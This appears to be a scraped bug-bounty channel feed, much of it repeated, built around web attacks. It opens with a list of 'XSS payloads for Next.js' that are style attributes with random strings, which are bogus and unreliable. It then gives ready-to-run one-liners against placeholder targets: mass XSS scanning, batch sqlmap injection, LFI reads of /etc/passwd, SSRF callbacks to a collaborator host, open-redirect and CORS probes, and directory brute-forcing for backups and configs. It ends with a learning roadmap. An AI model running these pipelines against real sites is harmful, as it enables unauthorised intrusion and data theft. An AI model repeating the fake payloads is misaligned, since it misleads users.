Lesser-known XSS payloads that work with Next.js
[ what you think? ]
- Dynamic CSS injection
<div style={
- CSS Variable injection
<div style={
- Object Literal injection
<div style={
- CSS Flexbox injection
<div style={
- Unicode Character injection
<div style={
- Dynamic Font injection
<div style={
- CSS Animation injection
<div style={
- Web Font injection
<div style={
- CSS Grid injection
<div style={
- CSS Transform injection
<div style={
[ what you think? ]
- Dynamic CSS injection
<div style={
background-color: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- CSS Variable injection
<div style={
--var: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Object Literal injection
<div style={
position: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- CSS Flexbox injection
<div style={
display: flex; justify-content: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Unicode Character injection
<div style={
font-family: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Dynamic Font injection
<div style={
font-family: ${Math.random().toString(36).substr(2, 10) + 'px'}}>XSS</div>- CSS Animation injection
<div style={
animation: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Web Font injection
<div style={
font-family: ${Math.random().toString(36).substr(2, 10) + '-webfont'}}>XSS</div>- CSS Grid injection
<div style={
display: grid; grid-template-columns: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- CSS Transform injection
<div style={
transform: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>👍25❤3👏3
Today I made a video that uses a tool through the video and can detect xss through a tool without having to do anything else.
🔥13
🚀 Automated XSS Methodology for Bug Bounty Hunters | 1-Click Exploits
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
YouTube
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
❤10👍2
👨💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
🔥18❤14👍8🥰4
⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
❤10👍2🤡2⚡1👎1🖕1
Bug - Information disclosure on restricted subdomain
Steps:
subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}
cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,https://sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt
hashtag#Infosec hashtag#Bugbounty hashtag#WAPT
Steps:
subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}
cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,https://sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt
hashtag#Infosec hashtag#Bugbounty hashtag#WAPT
👍33🔥11❤4
Automated JS Endpoint Extraction and Verification with HTTPX and Gau
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
❤24👍10🔥9😎1
Sorry I can't give you anything or watch any videos because I'm really busy with my college for a few days and I have some work to do.
🙏17❤9⚡3🤩2👎1💔1
2025 Roadmap:
1)Portswigger labs:
pick one lab for eg ssrf give it 2-3 days to complete all. for me i complete these types of labs in some hour but dont do that. do with relex mind and with aim for learning not for just completing the labs.
2) HackerOne reports:
next task is to read all reports of same labs like ssrf just focus on one bug and follow the methodlogy and learn real world scanario and try to find same on real world target.
3) Medium writups:
install medium app make acc there and follow all the publications like infosec writups and related to the bug hunting read there articles you will get real world experience i will soon share my all writups also..
4)Bugbountyhunting.com
make acc in that website good for testing your skills and solve there challanges you will get real world experience.
5) CTF
make acc on HTB and Tryhackme solve only webapps labs and rooms there to get more experience.
6)YT
follow some people on yt that show real world poc practicles you will get good understanding in video more then written poc good for beginners..
7)Bookmark
bookmark some website like hacktricks and some github pages like bughunting methodlogy or related to payloads and methods repo you will get all payloads from there.
8)Engage with people or make friend who have same interest and work like team collab with them that will double help you in bug hunting..
9) Dont look for comman bugs:
i see many people ask me why i dont find bugs i spend much time still..the answer is you are findings bugs that are so common like xss and p4 more there are many professional hunter in bbp platform who alrday hunted these on all programs so better to find more advance bugs like dependencies confusion,http request smuggling,bac,auth bypass etc bugs then your chances are more then before..if you are not finding bugs that mean you need to work on more skills and new methods.
10) avoid social media
avoid social media seriouslyy this will consume your so much time there algorithm are so strong that they will ingage your with your interests stufss mostly these will show you love,relationship, breakups, beuty,looks perfections, rich things and other mentally disturbing things like soft porn etc also avoid playing online games plz avoid it if you want to use better to use linkedin twitter etc or related to information sharing apps this will help your mind to focus more on the things that u want..
if you follow these things i am 100% sure you will see results in some months if you are really serious about your life..and i dont think nowdays you need any paid course stufss when the information is alrday free on internet you have all things in your hand you just need to find it also after chatgpt i dont think you need much struggle on all these things make chatgpt as your friend.. also mean while if you need any help regarding any bugs or chaining it always dm me i will sure help when i get time..all the best for your new year jurney ❤️
1)Portswigger labs:
pick one lab for eg ssrf give it 2-3 days to complete all. for me i complete these types of labs in some hour but dont do that. do with relex mind and with aim for learning not for just completing the labs.
2) HackerOne reports:
next task is to read all reports of same labs like ssrf just focus on one bug and follow the methodlogy and learn real world scanario and try to find same on real world target.
3) Medium writups:
install medium app make acc there and follow all the publications like infosec writups and related to the bug hunting read there articles you will get real world experience i will soon share my all writups also..
4)Bugbountyhunting.com
make acc in that website good for testing your skills and solve there challanges you will get real world experience.
5) CTF
make acc on HTB and Tryhackme solve only webapps labs and rooms there to get more experience.
6)YT
follow some people on yt that show real world poc practicles you will get good understanding in video more then written poc good for beginners..
7)Bookmark
bookmark some website like hacktricks and some github pages like bughunting methodlogy or related to payloads and methods repo you will get all payloads from there.
8)Engage with people or make friend who have same interest and work like team collab with them that will double help you in bug hunting..
9) Dont look for comman bugs:
i see many people ask me why i dont find bugs i spend much time still..the answer is you are findings bugs that are so common like xss and p4 more there are many professional hunter in bbp platform who alrday hunted these on all programs so better to find more advance bugs like dependencies confusion,http request smuggling,bac,auth bypass etc bugs then your chances are more then before..if you are not finding bugs that mean you need to work on more skills and new methods.
10) avoid social media
avoid social media seriouslyy this will consume your so much time there algorithm are so strong that they will ingage your with your interests stufss mostly these will show you love,relationship, breakups, beuty,looks perfections, rich things and other mentally disturbing things like soft porn etc also avoid playing online games plz avoid it if you want to use better to use linkedin twitter etc or related to information sharing apps this will help your mind to focus more on the things that u want..
if you follow these things i am 100% sure you will see results in some months if you are really serious about your life..and i dont think nowdays you need any paid course stufss when the information is alrday free on internet you have all things in your hand you just need to find it also after chatgpt i dont think you need much struggle on all these things make chatgpt as your friend.. also mean while if you need any help regarding any bugs or chaining it always dm me i will sure help when i get time..all the best for your new year jurney ❤️
🔥15❤8👍3
Find XSS Using KNOXSS
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
# Subdomain Enumerationsubfinder -d domain -all | tee -a domain.subs
subdominator -d domain | tee -a domain.subs
# Check live subdomains
cat domain.subs | httpx -o domain.live
cat domain.live | wayback |anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge All results
cat xss-wayback xss-katana xss-gau |anew xss.txt
cat domain.live | wayback |anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge All results
cat xss-wayback xss-katana xss-gau | anew xss.txt
cat xss.txt |sort -u | grep "=" | egrep -iv ".(css|woff|woff2|txt|js|m4r|m4p|m4b|ipa|asa|pkg|crash|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|webp|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|webm|mpp|_otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|_ttf|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)" | uro | httpx | anew xss
#Run knoxnl With GET & POST Methods
knoxnl -i xss.txt -X BOTH -s -o xssoutput.txt
2❤24👍8🔥6👎2